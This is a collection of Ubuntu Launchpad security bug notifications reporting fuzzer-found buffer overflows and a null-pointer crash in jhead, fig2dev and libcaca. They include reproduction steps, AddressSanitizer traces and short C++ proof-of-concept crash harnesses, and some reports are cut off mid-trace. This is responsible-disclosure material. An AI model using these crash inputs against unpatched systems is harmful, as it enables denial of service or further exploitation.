[Bug 1929145] [NEW] heap-buffer-overflow of exif.c in function Put16u
*** This bug is a security vulnerability *** Public security bug reported: Hello Ubuntu Security Team I used aflfuzzer to test jhead and found a overflow vulnerabilities.I mentioned issues - https://github.com/Matthias-Wandel/jhead/issues/36 info: ubuntu 20.04 TLS ``` $ sudo apt search jhead Sorting... Done Full Text Search... Done jhead/focal 1:3.04-1 amd64 manipulate the non-image part of Exif compliant JPEG files ``` Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Source code jhead version 3.06 commit 78057ab115e7fe68ba18869f97240cba58b9e996 Thank ** Affects: jhead (Ubuntu) Importance: Undecided Status: New ** Tags: security ** Attachment added: "poc" https://bugs.launchpad.net/bugs/1929145/+attachment/5499133/+files/jhead_poc.zip ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Bugs, which is subscribed to Ubuntu. https://bugs.launchpad.net/bugs/1929145 Title: heap-buffer-overflow of exif.c in function Put16u To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/jhead/+bug/1929145/+subscriptions -- ubuntu-bugs mailing list ubuntu-bugs@lists.ubuntu.com https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
[Bug 1926673] Re: Null pointer of fig2dev of gensvg.c in function svg_arrows
Can you apply for cve for me -- You received this bug notification because you are a member of Ubuntu Bugs, which is subscribed to Ubuntu. https://bugs.launchpad.net/bugs/1926673 Title: Null pointer of fig2dev of gensvg.c in function svg_arrows To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/fig2dev/+bug/1926673/+subscriptions -- ubuntu-bugs mailing list ubuntu-bugs@lists.ubuntu.com https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
[Bug 1926676] [NEW] global-buffer-overflow of fig2dev of gensvg.c in function arrow_path
*** This bug is a security vulnerability *** Public security bug reported: Hi I found an overflow error. issues: https://sourceforge.net/p/mcj/tickets/115/ commit: https://sourceforge.net/p/mcj/fig2dev/ci/8c0917994e49110004a6632d0a66ea19501ad39d/ System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 fig2dev Version 3.2.8a Verification steps: 1.Get the source code of fig2dev 2.Compile the fig2dev $ cd fig2dev-3.2.8a $ ./configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address" $ make 3.run fig2dev $ ./fig2dev -L svg fig2dev_crash_arrow_path asan info http://www.w3.org/2000/svg; xmlns:xlink="http://www.w3.org/1999/xlink; width="205pt" height="117pt" viewBox="-1795 -376 3416 1946"> = ==3290613==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00f71218 at pc 0x00589130 bp 0x7ffe395b8990 sp 0x7ffe395b8988 READ of size 4 at 0x00f71218 thread T0 #0 0x58912f in arrow_path /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1082:40 #1 0x5856af in svg_arrows /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1174:2 #2 0x586e30 in gensvg_arc /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c #3 0x4d0847 in gendev_objects /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:1008:6 #4 0x4d0847 in main /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:485:11 #5 0x7f25970a30b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #6 0x41c71d in _start (/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev+0x41c71d) 0x00f71218 is located 8 bytes to the left of global variable 'fpoints' defined in 'gensvg.c:1130:18' (0xf71220) of size 400 0x00f71218 is located 52 bytes to the right of global variable 'bnclippoints' defined in 'gensvg.c:1129:41' (0xf711e0) of size 4 SUMMARY: AddressSanitizer: global-buffer-overflow /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1082:40 in arrow_path Shadow bytes around the buggy address: 0x801e61f0: f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 0x801e6200: f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 0x801e6210: f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 0x801e6220: f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 0x801e6230: f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 =>0x801e6240: f9 f9 f9[f9]00 00 00 00 00 00 00 00 00 00 00 00 0x801e6250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x801e6260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x801e6270: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x801e6280: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 0x801e6290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user:f7 Container overflow: fc Array cookie:ac Intra object redzone:bb ASan internal: fe Left alloca redzone: ca Right alloca redzone:cb Shadow gap: cc ==3290613==ABORTING ** Affects: xfig (Ubuntu) Importance: Undecided Status: New ** Tags: security ** Attachment added: "fig2dev_crash_arrow_path" https://bugs.launchpad.net/bugs/1926676/+attachment/5493453/+files/fig2dev_crash_arrow_path ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Bugs, which is subscribed to Ubuntu. https://bugs.launchpad.net/bugs/1926676 Title: global-buffer-overflow of fig2dev of gensvg.c in function arrow_path To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xfig/+bug/1926676/+subscriptions -- ubuntu-bugs mailing list ubuntu-bugs@lists.ubuntu.com https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
[Bug 1926677] [NEW] global-buffer-overflow of fix2dev of fig2dev/read.c in function read_objects
*** This bug is a security vulnerability *** Public security bug reported: Hi I found an crash error. issues: https://sourceforge.net/p/mcj/tickets/116/ commit:https://sourceforge.net/p/mcj/fig2dev/ci/6827c09d2d6491cb2ae3ac7196439ff3aa791fd9/ System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 fig2dev Version 3.2.8a Verification steps: 1.Get the source code of fig2dev 2.Compile the fig2dev $ cd fig2dev-3.2.8a $ ./configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address" $ make 3.run fig2dev $ ./fig2dev -L box fig2dev_box_crash asan info Invalid color definition at line 11:0#U75 0 6750 #1 -1 4 -1 -1 0.000 0 0 1 0 -1 0 0,5, setting to black (#0). Invalid color definition at line 12: 0 i, setting to black (#0). = ==2147685==ERROR: AddressSanitizer: global-buffer-overflow on address 0x5583735f1b08 at pc 0x7f195e0bc715 bp 0x7ffd510f0020 sp 0x7ffd510ef7b0 WRITE of size 14 at 0x5583735f1b08 thread T0 #0 0x7f195e0bc714 in vsprintf (/lib/x86_64-linux-gnu/libasan.so.5+0x9e714) #1 0x7f195e0bcbce in sprintf (/lib/x86_64-linux-gnu/libasan.so.5+0x9ebce) #2 0x558373381445 in read_objects /home/hh/target/fuzzer/xfig/fig2dev-3.2.8a/fig2dev/read.c:505 #3 0x558373381445 in readfp_fig /home/hh/target/fuzzer/xfig/fig2dev-3.2.8a/fig2dev/read.c:152 #4 0x5583733824c3 in read_fig /home/hh/target/fuzzer/xfig/fig2dev-3.2.8a/fig2dev/read.c:124 #5 0x55837334b320 in main /home/hh/target/fuzzer/xfig/fig2dev-3.2.8a/fig2dev/fig2dev.c:424 #6 0x7f195dce80b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #7 0x55837334d26d in _start (/home/hh/target/fuzzer/xfig/fig2dev-3.2.8a/fig2dev/fig2dev+0x7026d) 0x5583735f1b08 is located 56 bytes to the left of global variable 'support_i18n' defined in 'fig2dev.c:83:6' (0x5583735f1b40) of size 1 'support_i18n' is ascii string '' 0x5583735f1b08 is located 0 bytes to the right of global variable 'gif_transparent' defined in 'fig2dev.c:85:6' (0x5583735f1b00) of size 8 SUMMARY: AddressSanitizer: global-buffer-overflow (/lib/x86_64-linux-gnu/libasan.so.5+0x9e714) in vsprintf Shadow bytes around the buggy address: 0x0ab0ee6b6310: 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 0x0ab0ee6b6320: 01 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 0x0ab0ee6b6330: 00 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 0x0ab0ee6b6340: 04 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9 0x0ab0ee6b6350: 04 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 =>0x0ab0ee6b6360: 00[f9]f9 f9 f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9 0x0ab0ee6b6370: 01 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9 0x0ab0ee6b6380: 01 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9 0x0ab0ee6b6390: 01 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9 0x0ab0ee6b63a0: 01 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9 0x0ab0ee6b63b0: 01 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user:f7 Container overflow: fc Array cookie:ac Intra object redzone:bb ASan internal: fe Left alloca redzone: ca Right alloca redzone:cb Shadow gap: cc ==2147685==ABORTING ** Affects: xfig (Ubuntu) Importance: Undecided Status: New ** Tags: security ** Attachment added: "fig2dev_box_crash" https://bugs.launchpad.net/bugs/1926677/+attachment/5493454/+files/fig2dev_box_crash ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Bugs, which is subscribed to Ubuntu. https://bugs.launchpad.net/bugs/1926677 Title: global-buffer-overflow of fix2dev of fig2dev/read.c in function read_objects To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xfig/+bug/1926677/+subscriptions -- ubuntu-bugs mailing list ubuntu-bugs@lists.ubuntu.com https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
[Bug 1926673] [NEW] Null pointer of fig2dev of gensvg.c in function svg_arrows
*** This bug is a security vulnerability *** Public security bug reported: Hi I found an crash error. issues: https://sourceforge.net/p/mcj/tickets/114/ commit:https://sourceforge.net/p/mcj/fig2dev/ci/43cfa693284b076e5d2cc100758a34b76db65e58/ System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 fig2dev Version 3.2.8a Verification steps: 1.Get the source code of fig2dev 2.Compile the fig2dev ```bash $ cd fig2dev-3.2.8a $ ./configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address" $ make ``` 3.run fig2dev ```bash $ ./fig2dev -L svg fig2dev_crash ``` asan info: http://www.w3.org/2000/svg; xmlns:xlink="http://www.w3.org/1999/xlink; width="73pt" height="113pt" viewBox="-76 -376 1202 1877"> AddressSanitizer:DEADLYSIGNAL = ==3255219==ERROR: AddressSanitizer: SEGV on unknown address 0x (pc 0x00583a3d bp 0x7ffec0773610 sp 0x7ffec0773590 T0) ==3255219==The signal is caused by a READ memory access. ==3255219==Hint: address points to the zero page. #0 0x583a3d in svg_arrows /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24 #1 0x583a3d in gensvg_line /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:743:17 #2 0x4d0847 in gendev_objects /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:1008:6 #3 0x4d0847 in main /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:485:11 #4 0x7f5e0e4f50b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #5 0x41c71d in _start (/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev+0x41c71d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24 in svg_arrows ==3255219==ABORTING ** Affects: xfig (Ubuntu) Importance: Undecided Assignee: xiao huang (shanzhuli) Status: New ** Tags: security ** Information type changed from Private Security to Public Security ** Summary changed: - fig2dev + Null pointer of fig2dev of gensvg.c in function svg_arrows ** Description changed: Hi I found an crash error. issues: https://sourceforge.net/p/mcj/tickets/114/ - + commit:https://sourceforge.net/p/mcj/fig2dev/ci/43cfa693284b076e5d2cc100758a34b76db65e58/ System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 fig2dev Version 3.2.8a Verification steps: 1.Get the source code of fig2dev 2.Compile the fig2dev ```bash $ cd fig2dev-3.2.8a $ ./configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address" - $ make + $ make ``` 3.run fig2dev ```bash $ ./fig2dev -L svg fig2dev_crash ``` asan info: http://www.w3.org/2000/svg; - xmlns:xlink="http://www.w3.org/1999/xlink; - width="73pt" height="113pt" - viewBox="-76 -376 1202 1877"> + xmlns:xlink="http://www.w3.org/1999/xlink; + width="73pt" height="113pt" + viewBox="-76 -376 1202 1877"> + stroke="#00" stroke-width="8px"/> + stroke="#ff" stroke-width="8px"/> + stroke="#ff" stroke-width="8px"/> + x="0" y="0" width="134" height="134"> + stroke="#00" stroke-width="8px"/> + stroke="#00" stroke-width="8px"/> AddressSanitizer:DEADLYSIGNAL = ==3255219==ERROR: AddressSanitizer: SEGV on unknown address 0x (pc 0x00583a3d bp 0x7ffec0773610 sp 0x7ffec0773590 T0) ==3255219==The signal is caused by a READ memory access. ==3255219==Hint: address points to the zero page. - #0 0x583a3d in svg_arrows /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24 - #1 0x583a3d in gensvg_line /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:743:17 - #2 0x4d0847 in gendev_objects /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:1008:6 - #3 0x4d0847 in main /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:485:11 - #4 0x7f5e0e4f50b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 - #5 0x41c71d in _start (/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev+0x41c71d) + #0 0x583a3d in svg_arrows /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24 + #1 0x583a3d in gensvg_line /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:743:17 + #2 0x4d0847 in gendev_objects /home/hh/Downloads/fig2dev-3.
[Bug 1926674] [NEW] heap-buffer-overflow of fig2dev of gensvg.c in function gensvg_text
*** This bug is a security vulnerability *** Public security bug reported: Hi I found an overflow error. issues: https://sourceforge.net/p/mcj/tickets/113/ commit:https://sourceforge.net/p/mcj/fig2dev/ci/f8ce1ff8837056b12c046f56e3b5248b2c8eeaa1/ System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 fig2dev Version 3.2.8a Verification steps: 1.Get the source code of fig2dev 2.Compile the fig2dev $ cd fig2dev-3.2.8a $ ./configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address" $ make 3.run fig2dev $ ./fig2dev -L svg overflow_fig2dev_crash asan info: http://www.w3.org/2000/svg; xmlns:xlink="http://www.w3.org/1999/xlink; width="900pt" height="3600pt" viewBox="163 0 25 100"> = ==3221214==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200072 at pc 0x005888ef bp 0x7ffcc0226110 sp 0x7ffcc0226108 READ of size 1 at 0x60200072 thread T0 #0 0x5888ee in gensvg_text /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1006:42 #1 0x4d0847 in gendev_objects /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:1008:6 #2 0x4d0847 in main /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:485:11 #3 0x7f03fc8940b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #4 0x41c71d in _start (/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev+0x41c71d) 0x60200072 is located 0 bytes to the right of 2-byte region [0x60200070,0x60200072) allocated by thread T0 here: #0 0x494fd2 in calloc (/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev+0x494fd2) #1 0x4d5951 in read_textobject /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/read1_3.c:505:24 #2 0x4d2b8b in read_1_3_objects /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/read1_3.c:126:16 #3 0x4d666f in readfp_fig /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/read.c:154:12 #4 0x4d6312 in read_fig /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/read.c:124:10 #5 0x4d04cb in main /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:424:12 #6 0x7f03fc8940b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1006:42 in gensvg_text Shadow bytes around the buggy address: 0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c047fff8000: fa fa fd fa fa fa 00 04 fa fa 00 04 fa fa[02]fa 0x0c047fff8010: fa fa 00 07 fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user:f7 Container overflow: fc Array cookie:ac Intra object redzone:bb ASan internal: fe Left alloca redzone: ca Right alloca redzone:cb Shadow gap: cc ==3221214==ABORTING ** Affects: xfig (Ubuntu) Importance: Undecided Status: New ** Tags: security ** Attachment added: "overflow_fig2dev_crash" https://bugs.launchpad.net/bugs/1926674/+attachment/5493452/+files/overflow_fig2dev_crash ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Bugs, which is subscribed to Ubuntu. https://bugs.launchpad.net/bugs/1926674 Title: heap-buffer-overflow of fig2dev of gensvg.c in function gensvg_text To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xfig/+bug/1926674/+subscriptions -- ubuntu-bugs mailing list ubuntu-bugs@lists.ubuntu.com https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
[Bug 1925467] Re: stack-buffer-overflow of text.c in function _import_ansi
** Description changed:
Hello ubuntu security team
+
+ issues: https://github.com/cacalabs/libcaca/issues/55
+
System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
Fedora 33: clang 11.0.0 , gcc 10.2.1
libcaca version e4968ba
Verification steps:
1.Get the source code of libcaca
2.Compile the libcaca.so library
$ cd libcaca
$ ./bootstrap
$ ./configure
$ make
or
$ cd libcaca
$ ./bootstrap
$ ../configure CC="clang -O2 -fno-omit-frame-pointer -g
-fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link
-fsanitize-coverage=bb"
$ make
3.Create the poc_ansi.cc && build
#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include
#include
#include
#include
#include
#include
using namespace std;
void crash(const uint8_t *Data, size_t Size) {
- if(Size<8) return ;
- size_t len=0;
- caca_canvas_t *cv;
- cv = caca_create_canvas(0,0);
- caca_create_frame(cv,0);
- caca_set_frame(cv,0);
- caca_import_canvas_from_memory(cv,Data,Size,"ansi");
- caca_free_canvas(cv);
- cv=NULL;
+ if(Size<8) return ;
+ size_t len=0;
+ caca_canvas_t *cv;
+ cv = caca_create_canvas(0,0);
+ caca_create_frame(cv,0);
+ caca_set_frame(cv,0);
+ caca_import_canvas_from_memory(cv,Data,Size,"ansi");
+ caca_free_canvas(cv);
+ cv=NULL;
}
-
int main(int args,char* argv[]){
- size_t len = 0;
- unsigned char buffer[] =
{0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc};
- len = sizeof(buffer)/sizeof(unsigned char);
- printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
- crash((const uint8_t*)buffer,len);
+ size_t len = 0;
+ unsigned char buffer[] =
{0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc};
+ len = sizeof(buffer)/sizeof(unsigned char);
+ printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
+ crash((const uint8_t*)buffer,len);
- return 0;
+ return 0;
}
4.compile poc_ansi.cc
clang++ -g poc_ansi.cc -O2 -fno-omit-frame-pointer -fsanitize=address
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_ansi
5.Run poc_ansi
asan info:
=
==3763372==ERROR: AddressSanitizer: stack-buffer-overflow on address
0x7ffda0164bea at pc 0x7f098d82c310 bp 0x7ffda01647b0 sp 0x7ffda01647a8
READ of size 1 at 0x7ffda0164bea thread T0
- #0 0x7f098d82c30f in _import_ansi
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38
- #1 0x4c6c72 in crash(unsigned char const*, unsigned long)
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
- #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
- #3 0x7f098d2780b2 in __libc_start_main
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
- #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d)
+ #0 0x7f098d82c30f in _import_ansi
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38
+ #1 0x4c6c72 in crash(unsigned char const*, unsigned long)
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
+ #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
+ #3 0x7f098d2780b2 in __libc_start_main
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
+ #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d)
Address 0x7ffda0164bea is located in stack of thread T0 at offset 42 in frame
- #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
+ #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
- This frame has 1 object(s):
- [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this
variable
+ This frame has 1 object(s):
+ [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this
variable
HINT: this may be a false positive if your program uses some custom stack
unwind mechanism, swapcontext or vfork
- (longjmp and C++ exceptions *are* supported)
+ (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38 in _import_ansi
Shadow bytes around the buggy address:
- 0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
- 0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2
- 0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00
- 0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- 0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
+ 0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2
+ 0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00
+ 0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x100034024970:
[Bug 1925468] Re: stack-buffer-overflow of import.c in function _import_bin
** Description changed:
Hello ubuntu security team
+
+ issues:https://github.com/cacalabs/libcaca/issues/56
+
System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
Fedora 33: clang 11.0.0 , gcc 10.2.1
+
libcaca version e4968ba
Verification steps:
1.Get the source code of libcaca
2.Compile the libcaca.so library
$ cd libcaca
$ ./bootstrap
$ ./configure
$ make
or
$ cd libcaca
$ ./bootstrap
$ ../configure CC="clang -O2 -fno-omit-frame-pointer -g
-fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link
-fsanitize-coverage=bb"
$ make
3.Create the poc_bin.cc && build
#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include
#include
#include
#include
#include
#include
using namespace std;
void crash(const uint8_t *Data, size_t Size) {
- if(Size<8) return ;
- size_t len=0;
- caca_canvas_t *cv;
- cv = caca_create_canvas(0,0);
- caca_create_frame(cv,0);
- caca_set_frame(cv,0);
- caca_import_canvas_from_memory(cv,Data,Size,"bin");
- caca_free_canvas(cv);
- cv=NULL;
+ if(Size<8) return ;
+ size_t len=0;
+ caca_canvas_t *cv;
+ cv = caca_create_canvas(0,0);
+ caca_create_frame(cv,0);
+ caca_set_frame(cv,0);
+ caca_import_canvas_from_memory(cv,Data,Size,"bin");
+ caca_free_canvas(cv);
+ cv=NULL;
}
int main(int args,char* argv[]){
- size_t len = 0;
- unsigned char buffer[] =
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
- len = sizeof(buffer)/sizeof(unsigned char);
- printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
- crash((const uint8_t*)buffer,len);
- return 0;
+ size_t len = 0;
+ unsigned char buffer[] =
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
+ len = sizeof(buffer)/sizeof(unsigned char);
+ printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
+ crash((const uint8_t*)buffer,len);
+ return 0;
}
4.compile poc_bin.cc
clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin
5.Run poc_bin
asan info:
=
==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address
0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
READ of size 1 at 0x7ffe7cd3774d thread T0
- #0 0x7f8c6314acfc in _import_bin
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
- #1 0x4c6c72 in crash(unsigned char const*, unsigned long)
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
- #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
- #3 0x7f8c62ba00b2 in __libc_start_main
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
- #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)
+ #0 0x7f8c6314acfc in _import_bin
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
+ #1 0x4c6c72 in crash(unsigned char const*, unsigned long)
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
+ #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
+ #3 0x7f8c62ba00b2 in __libc_start_main
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
